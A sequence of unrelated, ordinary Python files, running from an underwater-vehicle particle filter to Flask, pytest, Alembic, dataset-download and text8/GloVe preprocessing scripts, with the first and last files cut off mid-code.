self.movement[Index.ALT, 0] = value.altitude def propagate(self, p, dt): """ This is the main method of MovementModel. It takes a state reference as argument and is supposed to extract the state's variables and manipulate them. dt means delta t and defines the time in seconds that has passed since the last filter update. @param state Reference to the state that has to be manipulated. @param dt time that has passed since the last filter update in seconds. """ depth_std_factor = self.sensors_std["position_z"]["factor"] depth_std_offset = self.sensors_std["position_z"]["offset"] velocity_std_factor = self.sensors_std["speed"]["factor"] velocity_std_offset = self.sensors_std["speed"]["offset"] imu_noise_std_offset = self.sensors_std["orientation"]["offset"] imu_noise_std_factor = self.sensors_std["orientation"]["factor"] k_dvl = self.dvl_noise_sigma_factor k_imu = self.imu_noise_sigma_factor def linear_noise(idx, factor, offset, gain=1.0): return ( self.movement[idx, 0] + randn() * (self.movement[idx, 0] * factor + offset) * gain ) # Propagate all states except for X and Y p.state[Index.Z, 0] = linear_noise( Index.Z, depth_std_factor, depth_std_offset ) p.state[Index.ROLL, 0] = linear_noise( Index.ROLL, imu_noise_std_factor, imu_noise_std_offset, k_imu ) p.state[Index.PITCH, 0] = linear_noise( Index.PITCH, imu_noise_std_factor, imu_noise_std_offset, k_imu ) p.state[Index.YAW, 0] = linear_noise( Index.YAW, imu_noise_std_factor, imu_noise_std_offset, k_imu ) p.state[Index.VX, 0] = linear_noise( Index.VX, velocity_std_factor, velocity_std_offset, k_dvl ) p.state[Index.VY, 0] = linear_noise( Index.VY, velocity_std_factor, velocity_std_offset, k_dvl ) p.state[Index.VZ, 0] = linear_noise( Index.VZ, velocity_std_factor, velocity_std_offset, k_dvl ) cr = math.cos(p.state[Index.ROLL, 0]) sr = math.sin(p.state[Index.ROLL, 0]) cp = math.cos(p.state[Index.PITCH, 0]) sp = math.sin(p.state[Index.PITCH, 0]) cy = math.cos(p.state[Index.YAW, 0]) sy = math.sin(p.state[Index.YAW, 0]) f = np.eye(Index.DIM, dtype=float) f[Index.X, Index.VX] = cy * cp * dt f[Index.X, Index.VY] = (cy * sp * sr - sy * cr) * dt f[Index.X, Index.VZ] = (cy * sp * cr + sy * sr) * dt f[Index.Y, Index.VX] = sy * cp * dt f[Index.Y, Index.VY] = (sy * sp * sr + cy * cr) * dt f[Index.Y, Index.VZ] = (sy * sp * cr - cy * sr) * dt f[Index.Z, Index.VX] = -sp * dt f[Index.Z, Index.VY] = cp * sr * dt f[Index.Z, Index.VZ] = cp * cr * dt # Propagate the p.state forward p.state = f @ p.state p.time += dt p.trajectory.append(p.state) p.trajectory_time.append(p.time) class ParticleFilter: def __init__( self, num_particles, movement_model, observation_model, expected_iterations=0, ): self.particles = [Particle()] * num_particles self.particles_history = [] self.iteration = 0 self.iteration_step = int(float(expected_iterations) / 20.0) self.mm = movement_model self.om = observation_model for p in self.particles: p.weight = 1.0 / float(num_particles) self.particles_history.append(self.particles) def __str__(self): a = ( "Particle Filter with " + str(len(self.particles)) + " particles.\n" ) for i, p in enumerate(self.particles): a += " Particle " + str(i) + "\n" a += ( " (x, y, theta) = (" + str(p.x) + ", " + str(p.y) + ", " + str(p.theta) + ")\n" ) a += " w = " + str(p.weight) + "\n" return a def set_prior(self, prior): for i in range(len(self.particles)): self.particles[i] = copy.deepcopy(prior) self.particles[i].weight = 1.0 / float(len(self.particles)) def set_observation(self, value): self.om.set_observation(value) def set_movement(self, value): self.mm.set_movement(value) def should_resample(self): return self.get_neff() < (len(self.particles) / 2.0) def propagate(self, dt): for p in self.particles: self.mm.propagate(p, dt) if self.iteration == self.iteration_step: self.particles_history.append(copy.deepcopy(self.particles)) self.iteration = 0 self.iteration += 1 def measure(self): for p in self.particles: p.weight *= self.om.measure(p) self.particles.sort(reverse=True) self.normalize() def normalize(self): s = [p.weight for p in self.particles] norm = np.sum(s) # Avoid division by zero if norm < 1e-20: norm += 1e-20 for p in self.particles: p.weight = p.weight / norm def resample(self): """ Importance resample """ inverse_num = 1.0 / len(self.particles) # random start in CDF start = uniform() * inverse_num cumulative_weight = 0.0 # index to draw from source_index = 0 cumulative_weight += self.particles[source_index].weight new_particles = [None] * len(self.particles) for dest_index, p in enumerate(self.particles): # amount of cumulative weight to reach prob_sum = start + inverse_num * dest_index # sum weights until while prob_sum > cumulative_weight: source_index += 1 if source_index >= len(self.particles): source_index = len(self.particles) - 1 break # target sum reached cumulative_weight += self.particles[source_index].weight # copy particle (via assignment operator) new_particles[dest_index] = copy.deepcopy( self.particles[source_index] ) # Update the particle list self.particles = new_particles def get_neff(self): """ Returns the number of effective particles """ weights = [p.weight for p in self.particles] return 1.0 / np.sum(np.square(weights)) def ParticleToSyncedOrientationBodyVelocity(p): sobv_list = [] for t, x in zip(p.trajectory_time, p.trajectory): m = SyncedOrientationBodyVelocity() m.epoch_timestamp = t m.northings = x[Index.X, 0] m.eastings = x[Index.Y, 0] m.depth = x[Index.Z, 0] m.roll = x[Index.ROLL, 0] * 180.0 / math.pi m.pitch = x[Index.PITCH, 0] * 180.0 / math.pi m.yaw = x[Index.YAW, 0] * 180.0 / math.pi m.x_velocity = x[Index.VX, 0] m.y_velocity = x[Index.VY, 0] m.z_velocity = x[Index.VZ, 0] m.altitude = x[Index.ALT, 0] sobv_list.append(m) return sobv_list def get_prior(dr_list, usbl_list): dr_index = 0 # Interpolate DR to USBL updates dr_eastings = [] dr_northings = [] for i in range(len(usbl_list)): usbl_t = usbl_list[i].epoch_timestamp dr_t = dr_list[dr_index + 1].epoch_timestamp while dr_index < len(dr_list) - 2 and usbl_t > dr_t: usbl_t = usbl_list[i].epoch_timestamp dr_t = dr_list[dr_index + 1].epoch_timestamp dr_index += 1 dr_eastings.append( interpolate( usbl_list[i].epoch_timestamp, dr_list[dr_index].epoch_timestamp, dr_list[dr_index + 1].epoch_timestamp, dr_list[dr_index].eastings, dr_list[dr_index + 1].eastings, ) ) dr_northings.append( interpolate( usbl_list[i].epoch_timestamp, dr_list[dr_index].epoch_timestamp, dr_list[dr_index + 1].epoch_timestamp, dr_list[dr_index].northings, dr_list[dr_index + 1].northings, ) ) usbl_eastings = [i.eastings for i in usbl_list] usbl_northings = [i.northings for i in usbl_list] eastings_error = [y - x for x, y in zip(dr_eastings, usbl_eastings)] northings_error = [y - x for x, y in zip(dr_northings, usbl_northings)] eastings_mean = np.mean(eastings_error) northings_mean = np.mean(northings_error) dr_index = 0 usbl_index = 0 usbl_t = usbl_list[usbl_index].epoch_timestamp dr_t = dr_list[usbl_index].epoch_timestamp while dr_index < len(dr_list) and usbl_t > dr_t: usbl_t = usbl_list[usbl_index].epoch_timestamp dr_t = dr_list[usbl_index].epoch_timestamp dr_index += 1 while usbl_index < len(usbl_list) and usbl_t < dr_t: usbl_t = usbl_list[usbl_index].epoch_timestamp dr_t = dr_list[usbl_index].epoch_timestamp usbl_index += 1 # Fix DR to index zero dr_index = 0 # Build state from first known USBL and DR, and use that displacement # error at the start of DR. x = dr_list[dr_index].northings + northings_mean y = dr_list[dr_index].eastings + eastings_mean z = dr_list[dr_index].depth alt = dr_list[dr_index].altitude roll = dr_list[dr_index].roll * math.pi / 180.0 pitch = dr_list[dr_index].pitch * math.pi / 180.0 heading = dr_list[dr_index].yaw * math.pi / 180.0 vx = dr_list[dr_index].x_velocity vy = dr_list[dr_index].y_velocity vz = dr_list[dr_index].z_velocity prior = Particle() prior.state = np.array( [ [x - northings_mean], [y - eastings_mean], [z], [roll], [pitch], [heading], [vx], [vy], [vz], [alt], ] ) prior.time = dr_list[0].epoch_timestamp return prior, dr_index, usbl_index def run_particle_filter( usbl_list, dr_list, num_particles, sensors_std, dvl_noise_sigma_factor, imu_noise_sigma_factor, usbl_noise_sigma_factor, measurement_update_flag=True, ): """Execute the particle filter over the dataset Args: usbl_list (list): List of USBL measurements dr_list (list): List of DR measurements num_particles (int): Number of particles sensors_std (list): List of sensors standard deviations dvl_noise_sigma_factor (float): DVL noise std multiplication factor imu_noise_sigma_factor (float): IMU noise std multiplication factor usbl_noise_sigma_factor (float): USBL noise std multiplication factor measurement_update_flag (bool, optional): Whether to perform updates or not. Returns: List: List containing at position 0: Output PF localisation 1: USBL data points used in updates 2: List of particles over time 3: Northings STD 4: Eastings STD 5: Yaw STD """ Console.info("Running Particle Filter with:") Console.info("\t* Number of particles: {}".format(num_particles)) Console.info( "\t* DVL noise std: f(x)={}x+{} m/s".format( sensors_std["speed"]["factor"], sensors_std["speed"]["offset"] ) ) Console.info( "\t* IMU noise std: f(x)={}x+{} deg".format( sensors_std["orientation"]["factor"], sensors_std["orientation"]["offset"], ) ) Console.info( "\t* Depth noise std: f(x)={}x+{} meters".format( sensors_std["position_z"]["factor"], sensors_std["position_z"]["offset"], ) ) Console.info( "\t* USBL noise std: f(x)={}x+{} meters".format( sensors_std["position_xy"]["factor"], sensors_std["position_xy"]["offset"], ) ) Console.info("Running {} iterations...".format(len(dr_list))) prior, dr_idx, usbl_idx = get_prior(dr_list, usbl_list) om = UsblObservationModel(usbl_noise_sigma_factor) mm = DeadReckoningMovementModel( sensors_std, dvl_noise_sigma_factor, imu_noise_sigma_factor ) pf = ParticleFilter( num_particles, mm, om, expected_iterations=len(dr_list) ) pf.set_prior(prior) last_t = dr_list[dr_idx].epoch_timestamp resampled_usbl_list = [] # Loop through all DR while dr_idx < len(dr_list): Console.progress(dr_idx, len(dr_list)) dr_stamp = dr_list[dr_idx].epoch_timestamp if usbl_idx < len(usbl_list): usbl_stamp = usbl_list[usbl_idx].epoch_timestamp else: # Fake a posterior USBL measurement to force PF to read DR usbl_stamp = dr_stamp + 1 if dr_stamp < usbl_stamp: # Compute delta t dt = dr_list[dr_idx].epoch_timestamp - last_t # Set the current movement pf.set_movement(dr_list[dr_idx]) # and propagate the filter pf.propagate(dt) last_t = dr_list[dr_idx].epoch_timestamp dr_idx += 1 elif usbl_idx < len(usbl_list): # Compute delta t dt = usbl_list[usbl_idx].epoch_timestamp - last_t # Set the measurement pf.set_observation(usbl_list[usbl_idx]) # Propagate pf.propagate(dt) # And measure. Resample if NEFF > 0.5 pf.measure() if pf.should_resample(): pf.resample() resampled_usbl_list.append(usbl_list[usbl_idx]) last_t = usbl_list[usbl_idx].epoch_timestamp usbl_idx += 1 # Find best particle best_particle = pf.particles[0] # Extract trajectory from it pf_list = ParticleToSyncedOrientationBodyVelocity(best_particle) # Get remaining bits particles_list = pf.particles_history # TODO: Compute std northings_std = [] eastings_std = [] yaw_std = [] print("Resampled {} times.".format(len(resampled_usbl_list))) return [ pf_list, resampled_usbl_list, particles_list, northings_std, eastings_std, yaw_std, ]
"""docstring for run.py app import create_app.""" import os from app import create_app config_name = os.getenv("FLASK_ENV") app = create_app(config_name) if __name__ == "__main__": app.run(threaded=True)
import math from flask import url_for from newsapp.models.article import Article def pagination(category: str, number: int) -> dict: page_count = Article.page_count(category) out = {} if number == 1: out["prev"] = "" out["labels"] = [ (i, url_for("main.news", category=category, number=i)) for i in range(1, 4) ] out["next"] = url_for("main.news", category=category, number=number + 1) elif number == page_count: out["prev"] = url_for("main.news", category=category, number=number - 1) out["labels"] = [ (i, url_for("main.news", category=category, number=i)) for i in range(number - 2, number + 1) ] out["next"] = "" else: out["prev"] = url_for("main.news", category=category, number=number - 1) out["labels"] = [ (i, url_for("main.news", category=category, number=i)) for i in range(number - 1, number + 2) ] out["next"] = url_for("main.news", category=category, number=number + 1) return out
"""database permission Revision ID: 50db531bbf54 Revises: 822b8de2c260 Create Date: 2016-08-01 11:50:51.872278 """ # revision identifiers, used by Alembic. revision = '50db531bbf54' down_revision = '822b8de2c260' branch_labels = None depends_on = None from alembic import op def upgrade(): op.execute("GRANT SELECT ON ALL TABLES IN SCHEMA public TO public;") def downgrade(): pass
""" This file is part of a simple toy neural network library. Author: Marcel Moosbrugger """ import numpy as np from simple_deep_learning.Layer import Layer class OutputLayer(Layer): def feed_forward(self, inputs): self.last_inputs = inputs + self.biases self.last_outputs = self.activation(self.last_inputs) def get_outputs(self): return self.last_outputs # logistic activation function for output layer def activation(self, x): return 1 / (1 + np.exp(-x)) def dactivation(self, x): return self.activation(x) * (1 - self.activation(x))
import pytest from .helpers import ( assert_equal_query, PandasBackend, SqlBackend, CloudBackend, BigqueryBackend, data_frame ) def pytest_addoption(parser): parser.addoption( "--dbs", action="store", default="sqlite", help="databases tested against (comma separated)" ) params_backend = [ pytest.param(lambda: SqlBackend("postgresql"), id = "postgresql", marks=pytest.mark.postgresql), pytest.param(lambda: SqlBackend("mysql"), id = "mysql", marks=pytest.mark.mysql), pytest.param(lambda: SqlBackend("sqlite"), id = "sqlite", marks=pytest.mark.sqlite), pytest.param(lambda: BigqueryBackend("bigquery"), id = "bigquery", marks=pytest.mark.bigquery), pytest.param(lambda: CloudBackend("snowflake"), id = "snowflake", marks=pytest.mark.snowflake), pytest.param(lambda: PandasBackend("pandas"), id = "pandas", marks=pytest.mark.pandas) ] @pytest.fixture(params = params_backend, scope = "session") def backend(request): return request.param() @pytest.fixture def skip_backend(request, backend): if request.node.get_closest_marker('skip_backend'): mark_args = request.node.get_closest_marker('skip_backend').args if backend.name in mark_args: pytest.skip('skipped on backend: {}'.format(backend.name)) @pytest.fixture def xfail_backend(request, backend): if request.node.get_closest_marker('xfail_backend'): mark_args = request.node.get_closest_marker('xfail_backend').args if backend.name in mark_args: pytest.xfail()
import random def play_game(choice): choices = ["rock", "paper", "scissor"] comp_choice = choices[random.randint(0,2)] player_choice = str(choice).lower() while True: if player_choice == comp_choice: print(f"Its a draw ..{player_choice} vs {comp_choice}!!") return elif player_choice == "rock" and comp_choice == "paper": print(f"You lose...{player_choice} gets covered by {comp_choice}") return elif player_choice == "rock" and comp_choice == "scissor": print(f"You win...{player_choice} smashes {comp_choice}") return elif player_choice == "scissor" and comp_choice == "paper": print(f"You win...{player_choice} cuts {comp_choice}") return elif player_choice == "scissor" and comp_choice == "rock": print(f"You lose...{player_choice} gets smashed by {comp_choice}") return elif player_choice == "paper" and comp_choice == "rock": print(f"You win ...{player_choice} covers {comp_choice}") return elif player_choice == "paper" and comp_choice == "scissor": print(f"You lose...{player_choice} gets cut by {comp_choice}") return else: print("Please enter rock, paper, or scissor") def main(): choice = str(input("Choose rock, paper, or scissor: ")) play_game(choice) play_again = True while play_again: play_again_input = input("Do you want to play again (y/n)? ").lower() while play_again_input not in ("y", "n"): play_again_input = input("Invalid Answer, Please Type 'y' or 'n'? ").lower() if play_again_input == "n": print("OK ...BYE BYE!!") return else: main () if __name__ == "__main__": main() # # guess the number # import random # def play_game(max_number): # random_number = random.randint(0, max_number) # guess = int(input(f"Guess A Number Between 0 and {max_number}: ")) # count = 1 # while True: # if guess > random_number: # guess = int(input("Too High! Guess Again: ")) # count += 1 # elif guess < random_number: # guess = int(input("Too Low! Guess Again: ")) # count += 1 # else: # print(f"You Got It In {count} Guesses!") # return count # def main(): # guesses = [] # play_again = True # while play_again: # max_number = int(input("Pick a max number: ")) # guesses.append(play_game(max_number)) # play_again_input = input("Do you want to play again (y/n)? ").lower() # while play_again_input not in ("y", "n"): # play_again_input = input("Invalid Answer, Please Type 'y' or 'n'? ").lower() # if play_again_input == "n": # print(f"The Max Number Of Guesses Was: {max(guesses)}") # print(f"The Min Number Of Guesses Was: {min(guesses)}") # print(f"The Average Number Of Guesses Was: {sum(guesses)/len(guesses)}") # return # else: # continue # if __name__ == "__main__": # main()
#!/usr/bin/env python from __future__ import print_function, absolute_import, division # -*- coding: utf-8 -*- """ Copyright (c) 2011, Kenneth Reitz <me@kennethreitz.com> Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. clint.textui.progress ~~~~~~~~~~~~~~~~~ This module provides the progressbar functionality. """ from collections import OrderedDict from os import path import glob import os import sys import tarfile import time import zipfile import yaml try: import requests except ImportError: print('this download script requires the requests module: conda install requests') sys.exit(1) STREAM = sys.stderr BAR_TEMPLATE = '%s[%s%s] %i/%i - %s\r' MILL_TEMPLATE = '%s %s %i/%i\r' DOTS_CHAR = '.' BAR_FILLED_CHAR = '#' BAR_EMPTY_CHAR = ' ' MILL_CHARS = ['|', '/', '-', '\\'] # How long to wait before recalculating the ETA ETA_INTERVAL = 1 # How many intervals (excluding the current one) to calculate the simple moving # average ETA_SMA_WINDOW = 9 class Bar(object): def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.done() return False # we're not suppressing exceptions def __init__(self, label='', width=32, hide=None, empty_char=BAR_EMPTY_CHAR, filled_char=BAR_FILLED_CHAR, expected_size=None, every=1): '''Bar is a class for printing the status of downloads''' self.label = label self.width = width self.hide = hide # Only show bar in terminals by default (better for piping, logging etc.) if hide is None: try: self.hide = not STREAM.isatty() except AttributeError: # output does not support isatty() self.hide = True self.empty_char = empty_char self.filled_char = filled_char self.expected_size = expected_size self.every = every self.start = time.time() self.ittimes = [] self.eta = 0 self.etadelta = time.time() self.etadisp = self.format_time(self.eta) self.last_progress = 0 if (self.expected_size): self.show(0) def show(self, progress, count=None): if count is not None: self.expected_size = count if self.expected_size is None: raise Exception("expected_size not initialized") self.last_progress = progress if (time.time() - self.etadelta) > ETA_INTERVAL: self.etadelta = time.time() self.ittimes = \ self.ittimes[-ETA_SMA_WINDOW:] + \ [-(self.start - time.time()) / (progress+1)] self.eta = \ sum(self.ittimes) / float(len(self.ittimes)) * \ (self.expected_size - progress) self.etadisp = self.format_time(self.eta) x = int(self.width * progress / self.expected_size) if not self.hide: if ((progress % self.every) == 0 or # True every "every" updates (progress == self.expected_size)): # And when we're done STREAM.write(BAR_TEMPLATE % ( self.label, self.filled_char * x, self.empty_char * (self.width - x), progress, self.expected_size, self.etadisp)) STREAM.flush() def done(self): self.elapsed = time.time() - self.start elapsed_disp = self.format_time(self.elapsed) if not self.hide: # Print completed bar with elapsed time STREAM.write(BAR_TEMPLATE % ( self.label, self.filled_char * self.width, self.empty_char * 0, self.last_progress, self.expected_size, elapsed_disp)) STREAM.write('\n') STREAM.flush() def format_time(self, seconds): return time.strftime('%H:%M:%S', time.gmtime(seconds)) def bar(it, label='', width=32, hide=None, empty_char=BAR_EMPTY_CHAR, filled_char=BAR_FILLED_CHAR, expected_size=None, every=1): """Progress iterator. Wrap your iterables with it.""" count = len(it) if expected_size is None else expected_size with Bar(label=label, width=width, hide=hide, empty_char=BAR_EMPTY_CHAR, filled_char=BAR_FILLED_CHAR, expected_size=count, every=every) \ as bar: for i, item in enumerate(it): yield item bar.show(i + 1) def ordered_load(stream, Loader=yaml.Loader, object_pairs_hook=OrderedDict): class OrderedLoader(Loader): pass def construct_mapping(loader, node): loader.flatten_mapping(node) return object_pairs_hook(loader.construct_pairs(node)) OrderedLoader.add_constructor( yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG, construct_mapping) return yaml.load(stream, OrderedLoader) class DirectoryContext(object): """ Context Manager for changing directories """ def __init__(self, path): self.old_dir = os.getcwd() self.new_dir = path def __enter__(self): os.chdir(self.new_dir) def __exit__(self, *args): os.chdir(self.old_dir) def _url_to_binary_write(url, output_path, title): '''Given a url, output_path and title, write the contents of a requests get operation to the url in binary mode and print the title of operation''' print('Downloading {0}'.format(title)) resp = requests.get(url, stream=True) try: with open(output_path, 'wb') as f: total_length = int(resp.headers.get('content-length')) for chunk in bar(resp.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1, every=1000): if chunk: f.write(chunk) f.flush() except: # Don't leave a half-written zip file if path.exists(output_path): os.remove(output_path) raise def _extract_downloaded_archive(output_path): '''Extract a local archive, e.g. zip or tar, then delete the archive''' if output_path.endswith("tar.gz"): with tarfile.open(output_path, "r:gz") as tar: tar.extractall() os.remove(output_path) elif output_path.endswith("tar"): with tarfile.open(output_path, "r:") as tar: tar.extractall() os.remove(output_path) elif output_path.endswith("tar.bz2"): with tarfile.open(output_path, "r:bz2") as tar: tar.extractall() os.remove(output_path) elif output_path.endswith("zip"): with zipfile.ZipFile(output_path, 'r') as zipf: zipf.extractall() os.remove(output_path) def _process_dataset(dataset, output_dir, here): '''Process each download spec in datasets.yml Typically each dataset list entry in the yml has "files" and "url" and "title" keys/values to show local files that must be present / extracted from a decompression of contents downloaded from the url. If a url endswith '/', then all files given are assumed to be added to the url pattern at the end ''' if not path.exists(output_dir): os.makedirs(output_dir) with DirectoryContext(output_dir): requires_download = False for f in dataset.get('files', []): if not path.exists(f): requires_download = True break if not requires_download: print('Skipping {0}'.format(dataset['title'])) return url = dataset['url'] title_fmt = dataset['title'] + ' {} of {}' if url.endswith('/'): urls = [url + f for f in dataset['files']] output_paths = [os.path.join(here, 'data', fname) for fname in dataset['files']] unpacked = ['.'.join(output_path.split('.')[:(-2 if output_path.endswith('gz') else -1)]) + '*' for output_path in output_paths] else: urls = [url] output_paths = [path.split(url)[1]] unpacked = dataset['files'] if not isinstance(unpacked, (tuple, list)): unpacked = [unpacked] zipped = zip(urls, output_paths, unpacked) for idx, (url, output_path, unpack) in enumerate(zipped): running_title = title_fmt.format(idx + 1, len(urls)) if glob.glob(unpack) or os.path.exists(unpack.replace('*','')): # Skip a file if a similar one is downloaded: # i.e. one that has same name but dif't extension print('Skipping {0}'.format(running_title)) continue _url_to_binary_write(url, output_path, running_title) _extract_downloaded_archive(output_path) def main(): '''Download each dataset specified by datasets.yml in this directory''' here = path.abspath(path.join(path.split(__file__)[0])) info_file = path.join(here, 'datasets.yml') with open(info_file) as f: info = ordered_load(f.read()) for topic, downloads in info.items(): output_dir = path.join(here, topic) for d in downloads: _process_dataset(d, output_dir, here) if __name__ == '__main__': main()
import asyncio import pathlib import pytest @pytest.fixture def examples_dir(request): return pathlib.Path(request.config.rootdir) / "examples" async def run_example(examples_dir, example_file): """ Run example and yield output line by line. """ proc = await asyncio.create_subprocess_exec( "python", str(examples_dir / example_file), stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.STDOUT, ) while True: data = await proc.stdout.readline() if data == b"": break line = data.decode("ascii").rstrip() yield line async def run_example_until(examples_dir, example_file, predicate_fn): """ Run example until it has matched a criteria for being considered successful. """ seen = [] # We expose this in the lambda to improve ergonomics def contains_substring(word): return any(word in x for x in seen) async for line in run_example(examples_dir, example_file): seen.append(line) if predicate_fn(seen, contains_substring): break assert predicate_fn(seen, contains_substring) @pytest.mark.asyncio @pytest.mark.timeout(3) async def test_request_example(examples_dir): await run_example_until( examples_dir, "request_api.py", lambda lines, contains: contains("Requesting") and contains("Got answer: Yay") and len(lines) >= 6, ) @pytest.mark.asyncio @pytest.mark.timeout(5) async def test_inter_process_ping_pong_example(examples_dir): await run_example_until( examples_dir, "inter_process_ping_pong.py", lambda lines, contains: contains("Hello from proc1") and contains("Hello from proc2") and contains("Received via SUBSCRIBE API in proc2") and contains("Received via SUBSCRIBE API in proc1") and contains("Received via STREAM API in proc2"), )
""" build elasticsearch index template """ import json import logging import sys logger = logging.getLogger(__name__) def _get_template(schema, args): # mapping = { # field: {'type': 'keyword'} # for field in set(f for v in schema.values() for f in v.get('args', {}).keys() # | set(['id', 'year', 'nuts_level', 'fact_key'])) # } # if args.fulltext: # mapping['fulltext_suggest'] = { # 'type': 'completion' # } # mapping['fulltext_suggest_context'] = { # 'type': 'completion', # 'contexts': [{ # 'name': 'suggest_context', # 'type': 'category' # }] # } return { 'index_patterns': [args.index_pattern], 'mappings': { 'properties': {**{ field: {'type': 'keyword'} for field in set( dimension for statistic in schema.values() for measure in statistic.get('measures', {}).values() for dimension in measure.get('dimensions', {}).keys() ) | set(['region_id', 'nuts', 'lau', 'cube', 'statistic']) }, **{'path': {'type': 'object'}, 'year': {'type': 'short'}}} }, 'settings': { 'index.mapping.total_fields.limit': 100000, 'index.number_of_shards': args.shards, 'index.number_of_replicas': args.replicas } } def main(args): with open(args.schema) as f: schema = json.load(f) sys.stdout.write(json.dumps(_get_template(schema, args), indent=2))
import shutil import sys from argparse import ArgumentParser from collections import Counter from pathlib import Path from zipfile import ZipFile import numpy as np import pandas as pd import requests from src.config import CONTEXT_SIZE, COVERAGE, DATA_DIR, TEXT8_URL, VOCAB_SIZE from src.utils.logger import get_logger logger = get_logger(__name__) def download_data(url=TEXT8_URL, dest_dir=DATA_DIR): # prepare destination dest = Path(dest_dir) / Path(url).name dest.parent.mkdir(parents=True, exist_ok=True) # downlaod zip if not dest.exists(): logger.info("downloading file: %s.", url) r = requests.get(url, stream=True) with dest.open("wb") as f: shutil.copyfileobj(r.raw, f) logger.info("file downloaded: %s.", dest) # extract zip if not Path(dest_dir, "text8").exists(): with dest.open("rb") as f, ZipFile(f, "r") as zf: zf.extractall(dest_dir) logger.info("file extracted.") def load_data(src_dir=DATA_DIR): file_path = Path(src_dir, "text8") with open(file_path) as f: text8 = f.read() logger.info("file loaded: %s.", file_path) return text8 def process_data(text8, vocab_size=VOCAB_SIZE, coverage=COVERAGE, context_size=CONTEXT_SIZE): text8_tokens = text8.split() # create vocab df_vocab = create_vocabulary(text8_tokens, vocab_size, coverage) vocab_size, _ = df_vocab.shape logger.info("vocab created, size: %s.", vocab_size) # compute interaction df_interaction = create_interaction_dataframe(text8_tokens, df_vocab, context_size) df_interaction = create_glove_dataframe(df_interaction) return {"vocabulary": df_vocab, "interaction": df_interaction} def create_vocabulary(text_tokens, vocab_size=VOCAB_SIZE, coverage=COVERAGE): tokens_counter = Counter(text_tokens) # find cumulative proportion of token counts counts = np.sort(list(tokens_counter.values()))[::-1] total = np.sum(counts) counts_cumprop = np.cumsum(counts) / total # get count with defined coverage of total tokens count_cutoff = counts[np.searchsorted(counts_cumprop, coverage)] logger.info("count cufoff: %s; token coverage: %s.", count_cutoff, coverage) # get vocab and counts vocab = [token for token, count in tokens_counter.most_common(vocab_size) if count >= count_cutoff] vocab_counts = [tokens_counter[token] for token in vocab] unk_count = total - np.sum(vocab_counts) df_vocab = pd.DataFrame({"token": ["<UNK>"] + vocab, "count": [unk_count] + vocab_counts}) df_vocab["proportion"] = df_vocab["count"] / total df_vocab = df_vocab.sort_values("count", ascending=False).reset_index(drop=True) return df_vocab def create_interaction_dataframe(text_tokens, df_vocab, context_size=CONTEXT_SIZE): token2id = {token: i for i, token in enumerate(df_vocab["token"])} token_ids = (token2id.get(token, 0) for token in text_tokens) df = pd.DataFrame(list(enumerate(token_ids)), columns=["position", "token_id"]) # cross join by position for right context only df_concat = pd.concat([df.set_index(df["position"] + i + 1) for i in range(context_size)]) df_co = df_concat.join(df, how="inner", lsuffix="_row", rsuffix="_col") df_co = df_co.loc[(df_co["token_id_row"] != df_co["token_id_col"]) & (df_co["position_row"] < df_co["position_col"]), :] df_co = df_co.assign(**{"value": 1 / (df_co["position_col"] - df_co["position_row"])}) # aggregate interactions df_agg = (df_co.groupby(["token_id_row", "token_id_col"])["value"] .agg(["count", "sum"]) .reset_index() .rename(columns={"token_id_row": "row_token_id", "token_id_col": "col_token_id", "sum": "value"})) df_agg = df_agg.loc[(df_agg["count"] != 0) & (df_agg["value"] != 0), :] # union swap row and col since symmetric dfs_agg = [df_agg, df_agg.rename(columns={"row_token_id": "col_token_id", "col_token_id": "row_token_id"})] df_agg = (pd.concat(dfs_agg, sort=False) .groupby(["row_token_id", "col_token_id"]) .sum() .reset_index()) # get vocab info df_agg["row_token"] = df_vocab["token"].to_numpy()[df_agg["row_token_id"]] df_agg["col_token"] = df_vocab["token"].to_numpy()[df_agg["col_token_id"]] df_agg = (df_agg.join(df_vocab.set_index("token"), on="row_token", rsuffix="_row") .join(df_vocab.set_index("token"), on="col_token", rsuffix="_col")) df_agg["neg_weight"] = df_agg["count_row"] * df_agg["proportion_col"] df_agg = df_agg.drop(columns=["count_row", "proportion", "count_col", "proportion_col"]) # randomise dataframe hashes = (df_agg["row_token"] .str.cat(df_agg["col_token"], sep=" ") .str.encode("utf8") .apply(hash)) df_agg = df_agg.set_index(hashes).sort_index() logger.info("interaction dataframe created.") logger.info("dataframe shape: %s.", df_agg.shape) return df_agg def create_glove_dataframe(df, count_minimum=10): # apply glove transformation df = df[df["count"] >= count_minimum].copy() df["glove_weight"] = glove_weight(df["count"]) df["glove_value"] = np.log(df["value"]) logger.info("dataframe shape: %s.", df.shape) return df def glove_weight(values, alpha=0.75, x_max=100): return np.clip(np.power(values / x_max, alpha), 0, 1) def save_data(data, save_dir=DATA_DIR): # save vocab df_vocab = data["vocabulary"] csv_path = Path(save_dir, "vocab.csv") df_vocab.to_csv(csv_path, index=False) logger.info("vocabulary dataframe saved: %s.", csv_path) txt_path = Path(save_dir, "vocab.txt") txt_path.write_text("\n".join(df_vocab["token"])) logger.info("vocabulary saved: %s.", txt_path) # save interaction df_interaction = data["interaction"] csv_path = Path(save_dir, "interaction.csv") df_interaction.to_csv(csv_path, index=False) logger.info("interaction dataframe saved: %s.", csv_path) return data def main(url, dest, vocab_size, coverage, context_size, **kwargs): download_data(url, dest) text8 = load_data(dest) data = process_data(text8, vocab_size, coverage, context_size) save_data(data, dest) if __name__ == "__main__": parser = ArgumentParser(description="Download, extract and prepare text8 data.") parser.add_argument( "--url", default=TEXT8_URL, help="url of text8 data (default: %(default)s)" ) parser.add_argument( "--dest", default=DATA_DIR, help="destination directory for downloaded and extracted files (default: %(default)s)" ) parser.add_argument( "--vocab-size", 